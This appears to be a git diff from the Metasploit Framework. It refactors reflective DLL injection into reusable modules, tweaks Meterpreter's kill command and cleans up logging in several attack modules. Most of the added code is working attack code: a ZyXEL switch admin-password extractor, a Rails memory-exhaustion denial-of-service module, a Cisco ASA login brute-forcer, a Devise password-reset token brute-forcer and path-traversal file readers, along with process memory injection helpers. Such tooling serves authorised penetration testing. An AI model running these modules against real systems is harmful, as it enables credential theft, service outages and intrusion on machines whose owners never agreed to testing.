'Description' => 'Inject a DLL via a reflective loader', 'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf' ], 'Author' => [ 'sf' ],
'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ], 'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86_64, 'Arch' => ARCH_X86_64,
'PayloadCompat' => 'PayloadCompat' =>
@ -47,26 +51,8 @@ module Payload::Windows::ReflectiveDllInject_x64
end end
def stage_payload def stage_payload
dll = "" # Exceptions will be thrown by the mixin if there are issues.
offset = 0 dll, offset = load_rdi_dll(library_path)
begin
::File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
raise "Can't find an exported ReflectiveLoader function!" if offset == 0
rescue
print_error( "Failed to read and parse Dll file: #{$!}" )
return
end
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration

60
lib/msf/core/post/windows/reflective_dll_injection.rb Normal file
View File

@ -0,0 +1,60 @@
# -*- coding: binary -*-
require 'msf/core/reflective_dll_loader'
###
#
# This module exposes functionality which makes it easier to do
# Reflective DLL Injection into processes on a victim's machine.
#
###
module Msf::Post::Windows::ReflectiveDLLInjection
include Msf::ReflectiveDLLLoader
PAGE_ALIGN = 1024
#
# Inject the given shellcode into a target process.
#
# @param process [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process]
# The process to inject the shellcode into.
# @param shellcode [String] The shellcode to inject.
#
# @return [Fixnum] Address of the shellcode in the target process's
# memory.
#
def inject_into_process(process, shellcode)
shellcode_size = shellcode.length
unless shellcode.length % PAGE_ALIGN == 0
shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
end
shellcode_mem = process.memory.allocate(shellcode_size)
process.memory.protect(shellcode_mem)
process.memory.write(shellcode_mem, shellcode)
return shellcode_mem
end
#
# Inject a reflectively-injectable DLL into the given process
# using reflective injection.
#
# @param process [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process]
# The process to inject the shellcode into.
# @param dll_path [String] Path to the DLL that is to be loaded and injected.
#
# @return [Array] Tuple of allocated memory address and offset to the
# +ReflectiveLoader+ function.
#
def inject_dll_into_process(process, dll_path)
dll, offset = load_rdi_dll(dll_path)
dll_mem = inject_into_process(process, dll)
return dll_mem, offset
end
end

43
lib/msf/core/reflective_dll_loader.rb Normal file
View File

@ -0,0 +1,43 @@
# -*- coding: binary -*-
###
#
# This mixin contains functionality which loads a Reflective
# DLL from disk into memory and finds the offset of the
# reflective loader's entry point.
#
###
module Msf::ReflectiveDLLLoader
#
# Load a reflectively-injectable DLL from disk and find the offset
# to the ReflectiveLoader function inside the DLL.
#
# @param dll_path Path to the DLL to load.
#
# @return [Array] Tuple of DLL contents and offset to the
# +ReflectiveLoader+ function within the DLL.
#
def load_rdi_dll(dll_path)
dll = ''
offset = nil
::File.open(dll_path, 'rb') { |f| dll = f.read }
pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
pe.exports.entries.each do |e|
if e.name =~ /^\S*ReflectiveLoader\S*/
offset = pe.rva_to_file_offset(e.rva)
break
end
end
unless offset
raise "Cannot find the ReflectiveLoader entry point in #{dll_path}"
end
return dll, offset
end
end

32
lib/msf/util/exe.rb
View File

@ -169,21 +169,11 @@ require 'msf/core/exe/segment_injector'
payload = win32_rwx_exec(code) payload = win32_rwx_exec(code)
# Create a new PE object and run through sanity checks # Create a new PE object and run through sanity checks
endjunk = true
fsize = File.size(opts[:template]) fsize = File.size(opts[:template])
pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true) pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
text = nil text = nil
sections_end = 0
pe.sections.each do |sec| pe.sections.each do |sec|
text = sec if sec.name == ".text" text = sec if sec.name == ".text"
sections_end = sec.size + sec.file_offset if sec.file_offset >= sections_end
endjunk = false if sec.contains_file_offset?(fsize-1)
end
#also check to see if there is a certificate
cert_entry = pe.hdr.opt['DataDirectory'][4]
#if the cert is the only thing past the sections, we can handle.
if cert_entry.v['VirtualAddress'] + cert_entry.v['Size'] >= fsize and sections_end >= cert_entry.v['VirtualAddress']
endjunk = false
end end
#try to inject code into executable by adding a section without affecting executable behavior #try to inject code into executable by adding a section without affecting executable behavior
@ -1729,8 +1719,25 @@ def self.to_vba(framework,code,opts={})
def self.to_executable_fmt_formats def self.to_executable_fmt_formats
[ [
'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe', "asp",
'vbs','loop-vbs','asp','aspx', 'aspx-exe','war','psh','psh-net', 'msi', 'msi-nouac' "aspx",
"aspx-exe",
"dll",
"elf",
"exe",
"exe-only",
"exe-service",
"exe-small",
"loop-vbs",
"macho",
"msi",
"msi-nouac",
"psh",
"psh-net",
"vba",
"vba-exe",
"vbs",
"war"
] ]
end end
@ -1757,4 +1764,3 @@ def self.to_vba(framework,code,opts={})
end end
end end
end end

24
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
View File

@ -329,13 +329,20 @@ class Console::CommandDispatcher::Stdapi::Sys
return true return true
end end
# validate all the proposed pids first so we can bail if one is bogus self_destruct = args.include?("-s")
valid_pids = validate_pids(args)
args.uniq! if self_destruct
diff = args - valid_pids.map {|e| e.to_s} valid_pids = [client.sys.process.getpid.to_i]
if not diff.empty? # then we had an invalid pid else
print_error("The following pids are not valid: #{diff.join(", ").to_s}. Quitting") valid_pids = validate_pids(args)
return false
# validate all the proposed pids first so we can bail if one is bogus
args.uniq!
diff = args - valid_pids.map {|e| e.to_s}
if not diff.empty? # then we had an invalid pid
print_error("The following pids are not valid: #{diff.join(", ").to_s}. Quitting")
return false
end
end end
# kill kill kill # kill kill kill
@ -348,8 +355,9 @@ class Console::CommandDispatcher::Stdapi::Sys
# help for the kill command # help for the kill command
# #
def cmd_kill_help def cmd_kill_help
print_line("Usage: kill pid1 pid2 pid3 ...") print_line("Usage: kill [pid1 [pid2 [pid3 ...]]] [-s]")
print_line("Terminate one or more processes.") print_line("Terminate one or more processes.")
print_line(" -s : Kills the pid associated with the current session.")
end end
# #

46
lib/rex/text.rb
View File

@ -115,6 +115,52 @@ module Text
return hexify(str, wrap, '"', '" +', "#{name} = \n", '"') return hexify(str, wrap, '"', '" +', "#{name} = \n", '"')
end end
#
# Creates a comma separated list of numbers
#
def self.to_num(str, wrap = DefaultWrap)
code = str.unpack('C*')
buff = ""
0.upto(code.length-1) do |byte|
if(byte % 15 == 0) and (buff.length > 0)
buff << "\r\n"
end
buff << sprintf('0x%.2x, ', code[byte])
end
# strip , at the end
buff = buff.chomp(', ')
buff << "\r\n"
return buff
end
#
# Creates a comma separated list of dwords
#
def self.to_dword(str, wrap = DefaultWrap)
code = str
alignnr = str.length % 4
if (alignnr > 0)
code << "\x00" * (4 - alignnr)
end
codevalues = Array.new
code.split("").each_slice(4) do |chars4|
chars4 = chars4.join("")
dwordvalue = chars4.unpack('*V')
codevalues.push(dwordvalue[0])
end
buff = ""
0.upto(codevalues.length-1) do |byte|
if(byte % 8 == 0) and (buff.length > 0)
buff << "\r\n"
end
buff << sprintf('0x%.8x, ', codevalues[byte])
end
# strip , at the end
buff = buff.chomp(', ')
buff << "\r\n"
return buff
end
# #
# Creates a ruby-style comment # Creates a ruby-style comment
# #

30
modules/auxiliary/admin/http/axigen_file_access.rb
View File

@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Trying to login")
print_status("#{@peer} - Trying to login")
if login if login
print_good("#{@peer} - Login successful") print_good("#{peer} - Login successful")
else else
print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options") print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
return return
end end
@ -69,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
@traversal.gsub!(/\//, "\\") @traversal.gsub!(/\//, "\\")
file.gsub!(/\//, "\\") file.gsub!(/\//, "\\")
else # unix else # unix
print_error("#{@peer} - *nix platform detected, vulnerability is only known to work on Windows") print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows")
return return
end end
@ -83,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
def read_file(file) def read_file(file)
print_status("#{@peer} - Retrieving file contents...") print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -98,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0
store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file) store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file)
print_good("#{@peer} - File successfully retrieved and saved on #{store_path}") print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
else else
print_error("#{@peer} - Failed to retrieve file") print_error("#{peer} - Failed to retrieve file")
end end
end end
def delete_file(file) def delete_file(file)
print_status("#{@peer} - Deleting file #{file}") print_status("#{peer} - Deleting file #{file}")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -121,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary
}) })
if res and res.code == 200 and res.body =~ /View Log Files/ if res and res.code == 200 and res.body =~ /View Log Files/
print_good("#{@peer} - File #{file} deleted") print_good("#{peer} - File #{file} deleted")
else else
print_error("#{@peer} - Error deleting file #{file}") print_error("#{peer} - Error deleting file #{file}")
end end
end end
def get_platform def get_platform
print_status("#{@peer} - Retrieving platform") print_status("#{peer} - Retrieving platform")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -142,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200 if res and res.code == 200
if res.body =~ /Windows/ if res.body =~ /Windows/
print_good("#{@peer} - Windows platform found") print_good("#{peer} - Windows platform found")
return 'windows' return 'windows'
elsif res.body =~ /Linux/ elsif res.body =~ /Linux/
print_good("#{@peer} - Linux platform found") print_good("#{peer} - Linux platform found")
return 'unix' return 'unix'
end end
end end
print_warning("#{@peer} - Platform not found, assuming UNIX flavor") print_warning("#{peer} - Platform not found, assuming UNIX flavor")
return 'unix' return 'unix'
end end

8
modules/auxiliary/admin/http/iis_auth_bypass.rb
View File

@ -76,19 +76,17 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
@peer = "#{rhost}:#{rport}"
if not has_auth if not has_auth
print_error("#{@peer} - No basic authentication enabled") print_error("#{peer} - No basic authentication enabled")
return return
end end
bypass_string = try_auth bypass_string = try_auth
if bypass_string.empty? if bypass_string.empty?
print_error("#{@peer} - The bypass attempt did not work") print_error("#{peer} - The bypass attempt did not work")
else else
print_good("#{@peer} - You can bypass auth by doing: #{bypass_string}") print_good("#{peer} - You can bypass auth by doing: #{bypass_string}")
end end
end end

21
modules/auxiliary/admin/http/intersil_pass_reset.rb
View File

@ -52,23 +52,22 @@ class Metasploit3 < Msf::Auxiliary
}) })
if (res and (m = res.headers['Server'].match(/Boa\/(.*)/))) if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
print_status("#{@peer} - Boa Version Detected: #{m[1]}") print_status("#{peer} - Boa Version Detected: #{m[1]}")
return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
return Exploit::CheckCode::Safe if (m[1][3].ord-48>4) return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
else else
print_status("#{@peer} - Not a Boa Server!") print_status("#{peer} - Not a Boa Server!")
return Exploit::CheckCode::Safe # not a boa server return Exploit::CheckCode::Safe # not a boa server
end end
rescue Rex::ConnectionRefused rescue Rex::ConnectionRefused
print_error("#{@peer} - Connection refused by server.") print_error("#{peer} - Connection refused by server.")
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
end end
def run def run
@peer = "#{rhost}:#{rport}"
return if check != Exploit::CheckCode::Vulnerable return if check != Exploit::CheckCode::Vulnerable
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
@ -81,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary
}) })
if res.nil? if res.nil?
print_error("#{@peer} - The server may be down") print_error("#{peer} - The server may be down")
return return
elsif res and res.code != 401 elsif res and res.code != 401
print_status("#{@peer} - #{uri} does not have basic authentication enabled") print_status("#{peer} - #{uri} does not have basic authentication enabled")
return return
end end
print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten") print_status("#{peer} - Server still operational. Checking to see if password has been overwritten")
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method'=> 'GET', 'method'=> 'GET',
@ -96,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary
}) })
if not res if not res
print_error("#{@peer} - Server timedout, will not continue") print_error("#{peer} - Server timedout, will not continue")
return return
end end
case res.code case res.code
when 200 when 200
print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}") print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
when 401 when 401
print_error("#{@peer} - Access forbidden. The password reset attempt did not work") print_error("#{peer} - Access forbidden. The password reset attempt did not work")
else else
print_status("#{@peer} - Unexpected response: Code #{res.code} encountered") print_status("#{peer} - Unexpected response: Code #{res.code} encountered")
end end
end end

26
modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
View File

@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Trying to login")
print_status("#{@peer} - Trying to login")
if login if login
print_good("#{@peer} - Login successful") print_good("#{peer} - Login successful")
else else
print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options") print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
return return
end end
@ -71,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
def read_file(file) def read_file(file)
print_status("#{@peer} - Copying file to Web location...") print_status("#{peer} - Copying file to Web location...")
dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/" dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/"
res = send_request_cgi( res = send_request_cgi(
@ -88,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary
}) })
if res and res.code == 200 and res.body =~ /\{"success":true\}/ if res and res.code == 200 and res.body =~ /\{"success":true\}/
print_good("#{@peer} - File #{file} copied to #{dst_path} successfully") print_good("#{peer} - File #{file} copied to #{dst_path} successfully")
else else
print_error("#{@peer} - Failed to copy #{file} to #{dst_path}") print_error("#{peer} - Failed to copy #{file} to #{dst_path}")
end end
print_status("#{@peer} - Retrieving file contents...") print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -103,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200 if res and res.code == 200
store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file) store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file)
print_good("#{@peer} - File successfully retrieved and saved on #{store_path}") print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
else else
print_error("#{@peer} - Failed to retrieve file") print_error("#{peer} - Failed to retrieve file")
end end
# Cleanup # Cleanup
@ -113,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary
end end
def delete_file(file) def delete_file(file)
print_status("#{@peer} - Deleting file #{file}") print_status("#{peer} - Deleting file #{file}")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -127,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary
}) })
if res and res.code == 200 and res.body =~ /\{"success":true\}/ if res and res.code == 200 and res.body =~ /\{"success":true\}/
print_good("#{@peer} - File #{file} deleted") print_good("#{peer} - File #{file} deleted")
else else
print_error("#{@peer} - Error deleting file #{file}") print_error("#{peer} - Error deleting file #{file}")
end end
end end

14
modules/auxiliary/admin/http/rails_devise_pass_reset.rb
View File

@ -52,6 +52,7 @@ class Metasploit3 < Msf::Auxiliary
[ [
OptString.new('TARGETURI', [ true, 'The request URI', '/users/password']), OptString.new('TARGETURI', [ true, 'The request URI', '/users/password']),
OptString.new('TARGETEMAIL', [true, 'The email address of target account']), OptString.new('TARGETEMAIL', [true, 'The email address of target account']),
OptString.new('OBJECTNAME', [true, 'The user object name', 'user']),
OptString.new('PASSWORD', [true, 'The password to set']), OptString.new('PASSWORD', [true, 'The password to set']),
OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]), OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]),
OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10]) OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10])
@ -61,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
def generate_token(account) def generate_token(account)
# CSRF token from GET "/users/password/new" isn't actually validated it seems. # CSRF token from GET "/users/password/new" isn't actually validated it seems.
postdata="user[email]=#{account}" postdata="#{datastore['OBJECTNAME']}[email]=#{account}"
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']), 'uri' => normalize_uri(datastore['TARGETURI']),
@ -100,11 +101,11 @@ class Metasploit3 < Msf::Auxiliary
encode_pass = REXML::Text.new(password).to_s encode_pass = REXML::Text.new(password).to_s
xml = "" xml = ""
xml << "<user>" xml << "<#{datastore['OBJECTNAME']}>"
xml << "<password>#{encode_pass}</password>" xml << "<password>#{encode_pass}</password>"
xml << "<password_confirmation>#{encode_pass}</password_confirmation>" xml << "<password_confirmation>#{encode_pass}</password_confirmation>"
xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>" xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>"
xml << "</user>" xml << "</#{datastore['OBJECTNAME']}>"
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']), 'uri' => normalize_uri(datastore['TARGETURI']),
@ -144,9 +145,10 @@ class Metasploit3 < Msf::Auxiliary
def run def run
# Clear outstanding reset tokens, helps ensure we hit the intended account. # Clear outstanding reset tokens, helps ensure we hit the intended account.
print_status("Clearing existing tokens...") if datastore['FLUSHTOKENS']
clear_tokens() if datastore['FLUSHTOKENS'] print_status("Clearing existing tokens...")
clear_tokens()
end
# Generate a token for our account # Generate a token for our account
print_status("Generating reset token for #{datastore['TARGETEMAIL']}...") print_status("Generating reset token for #{datastore['TARGETEMAIL']}...")
status = generate_token(datastore['TARGETEMAIL']) status = generate_token(datastore['TARGETEMAIL'])

14
modules/auxiliary/admin/http/sophos_wpa_traversal.rb
View File

@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
travs << file travs << file
travs << "%00" travs << "%00"
print_status("#{@peer} - Retrieving file contents...") print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -95,19 +95,17 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
print_status("#{@peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
if is_proficy? if is_proficy?
print_good("#{@peer} - Check successful") print_good("#{peer} - Check successful")
else else
print_error("#{@peer} - Sophos Web Protect Appliance vulnerable component not found") print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found")
return return
end end
contents = read_file(datastore['FILEPATH']) contents = read_file(datastore['FILEPATH'])
if contents.nil? if contents.nil?
print_error("#{@peer} - File not downloaded") print_error("#{peer} - File not downloaded")
return return
end end
@ -119,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary
contents, contents,
file_name file_name
) )
print_good("#{rhost}:#{rport} - File saved in: #{path}") print_good("#{peer} - File saved in: #{path}")
end end

79
modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb Normal file
View File

@ -0,0 +1,79 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'ZyXEL GS1510-16 Password Extractor',
'Description' => %q{
This module exploits a vulnerability in ZyXEL GS1510-16 routers
to extract the admin password. Due to a lack of authentication on the
webctrl.cgi script, unauthenticated attackers can recover the
administrator password for these devices. The vulnerable device
has reached end of life for support from the manufacturer, so it is
unlikely this problem will be addressed.
},
'References' =>
[
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2709' ]
],
'Author' => [
'Daniel Manser', # @antsygeek
'Sven Vetsch' # @disenchant_ch
],
'License' => MSF_LICENSE
)
end
def run
begin
print_status("Trying to get 'admin' user password ...")
res = send_request_cgi({
'uri' => "/webctrl.cgi",
'method' => 'POST',
'vars_post' => {
'username' => "admin",
'password' => "#{Rex::Text.rand_text_alphanumeric(rand(4)+4)}",
'action' => "cgi_login"
}
}, 10)
if (res && res.code == 200)
print_status("Got response from router.")
else
print_error('Unexpected HTTP response code.')
return
end
admin_password = ""
admin_password_matches = res.body.match(/show_user\(1,"admin","(.+)"/);
if not admin_password_matches
print_error('Could not obtain admin password')
return
else
admin_password = admin_password_matches[1];
print_good("Password for user 'admin' is: #{admin_password}")
report_auth_info(
:host => rhost,
:port => rport,
:sname => "ZyXEL GS1510-16",
:user => 'admin',
:pass => admin_password,
:active => true
)
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Failed to connect")
return
end
end
end

120
modules/auxiliary/dos/http/rails_action_view.rb Normal file
View File

@ -0,0 +1,120 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
'Description' => %q{
This module exploits a Denial of Service (DoS) condition in Action View that requires
a controller action. By sending a specially crafted content-type header to a rails
application, it is possible for it to store the invalid MIME type, and may eventually
consumes all memory if enough invalid MIMEs are given.
Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
},
'Author' =>
[
'Toby Hsieh', # Reported the issue
'joev', # Metasploit
'sinn3r' # Metasploit
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-6414' ],
[ 'OSVDB', '100525' ],
[ 'BID', '64074' ],
[ 'URL', 'http://seclists.org/oss-sec/2013/q4/400' ],
[ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]
],
'DisclosureDate' => 'Dec 04 2013'))
register_options(
[
Opt::RPORT(80),
OptString.new('URIPATH', [true, 'The URI that routes to a Rails controller action', '/']),
OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),
OptInt.new('REQCOUNT', [true, 'Number of HTTP requests to pipeline per connection', 1]),
OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])
],
self.class)
end
def host
host = datastore['RHOST']
host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
host
end
def long_string
Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])
end
#
# Returns a modified version of the URI that:
# 1. Always has a starting slash
# 2. Removes all the double slashes
#
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str.start_with?("/")
new_str = '/' + new_str
end
new_str
end
def http_request
uri = normalize_uri(datastore['URIPATH'])
http = ''
http << "GET #{uri} HTTP/1.1\r\n"
http << "Host: #{host}\r\n"
http << "Accept: #{long_string}\r\n"
http << "\r\n"
http
end
def run
begin
print_status("Stressing the target memory, this will take quite some time...")
datastore['RLIMIT'].times { |i|
connect
datastore['REQCOUNT'].times { sock.put(http_request) }
disconnect
}
print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Unable to connect to #{host}.")
rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.")
ensure
disconnect
end
end
end
=begin
Reproduce:
1. Add a def index; end to ApplicationController
2. Add an empty index.html.erb file to app/views/application/index.html.erb
3. Uncomment the last line in routes.rb
4. Hit /application
=end

138
modules/auxiliary/scanner/http/cisco_asa_asdm.rb Normal file
View File

@ -0,0 +1,138 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Cisco ASA ASDM Bruteforce Login Utility',
'Description' => %{
This module scans for Cisco ASA ASDM web login portals and
performs login brute force to identify valid credentials.
},
'Author' =>
[
'Jonathan Claudius <jclaudius[at]trustwave.com>',
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
OptString.new('USERNAME', [true, "A specific username to authenticate as", 'cisco']),
OptString.new('PASSWORD', [true, "A specific password to authenticate with", 'cisco'])
], self.class)
end
def run_host(ip)
unless check_conn?
print_error("#{peer} - Connection failed, Aborting...")
return
end
unless is_app_asdm?
print_error("#{peer} - Application does not appear to be Cisco ASA ASDM. Module will not continue.")
return
end
print_status("#{peer} - Application appears to be Cisco ASA ASDM. Module will continue.")
print_status("#{peer} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
# Verify whether the connection is working or not
def check_conn?
begin
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
})
print_good("#{peer} - Server is responsive...")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
return
end
end
# Verify whether we're working with ASDM or not
def is_app_asdm?
res = send_request_cgi(
{
'uri' => '/+webvpn+/index.html',
'method' => 'GET',
'agent' => 'ASDM/ Java/1.6.0_65'
})
if res &&
res.code == 200 &&
res.headers['Set-Cookie'].match(/webvpn/)
return true
else
return false
end
end
# Brute-force the login page
def do_login(user, pass)
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi({
'uri' => '/+webvpn+/index.html',
'method' => 'POST',
'agent' => 'ASDM/ Java/1.6.0_65',
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
'cookie' => 'webvpnlogin=1; tg=0DefaultADMINGroup',
'vars_post' => {
'username' => user,
'password' => pass,
'tgroup' => 'DefaultADMINGroup'
}
})
if res &&
res.code == 200 &&
res.body.match(/SSL VPN Service/) &&
res.body.match(/Success/) &&
res.body.match(/success/)
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
:port => rport,
:sname => 'Cisco ASA ASDM',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{peer} - HTTP Connection Failed, Aborting")
return :abort
end
end
end

17
modules/auxiliary/scanner/http/dolibarr_login.rb
View File

@ -62,11 +62,11 @@ class Metasploit3 < Msf::Auxiliary
# #
sid, token = get_sid_token sid, token = get_sid_token
if sid.nil? or token.nil? if sid.nil? or token.nil?
print_error("#{@peer} - Unable to obtain session ID or token, cannot continue") print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
return :abort return :abort
else else
vprint_status("#{@peer} - Using sessiond ID: #{sid}") vprint_status("#{peer} - Using sessiond ID: #{sid}")
vprint_status("#{@peer} - Using token: #{token}") vprint_status("#{peer} - Using token: #{token}")
end end
begin begin
@ -86,18 +86,18 @@ class Metasploit3 < Msf::Auxiliary
} }
}) })
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
vprint_error("#{@peer} - Service failed to respond") vprint_error("#{peer} - Service failed to respond")
return :abort return :abort
end end
if res.nil? if res.nil?
print_error("#{@peer} - Connection timed out") print_error("#{peer} - Connection timed out")
return :abort return :abort
end end
location = res.headers['Location'] location = res.headers['Location']
if res and res.headers and (location = res.headers['Location']) and location =~ /admin\// if res and res.headers and (location = res.headers['Location']) and location =~ /admin\//
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"") print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({ report_auth_info({
:host => rhost, :host => rhost,
:port => rport, :port => rport,
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
}) })
return :next_user return :next_user
else else
